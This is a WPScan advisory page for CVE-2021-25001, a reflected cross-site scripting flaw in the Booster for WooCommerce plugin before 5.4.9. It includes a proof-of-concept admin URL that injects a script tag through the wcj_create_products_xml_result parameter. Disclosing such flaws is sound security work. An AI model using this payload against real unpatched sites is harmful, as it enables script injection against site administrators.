WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in Product XML Feeds Module

Description

The plugin does not sanitise and escape the wcj_create_products_xml_result parameter before outputting back in the admin dashboard when the Product XML Feeds module is enabled, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

The "Product XML Feeds" module needs to be enabled in "Woocommerce -> Booster Settings".

https://example.com/wp-admin/admin.php?page=wc-settings&tab=jetpack&wcj-cat=products&section=products_xml&wcj_create_products_xml_result=1<script>alert(%2FXSS%2F)<%2Fscript>

Affects Plugins

woocommerce-jetpack
Fixed in version 5.4.9

References

CVE
CVE-2021-25001

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Jeremie Amsellem

Submitter

Jeremie Amsellem

Submitter website
https://fenrir.pro
Submitter twitter
lp1eu
Verified

Yes

WPVDB ID
76f0257d-aae7-4054-9b3d-ba10b4005cf1

Timeline

Publicly Published

2021-12-01 (about 5 months ago)

Added

2021-12-01 (about 5 months ago)

Last Updated

2022-04-09 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin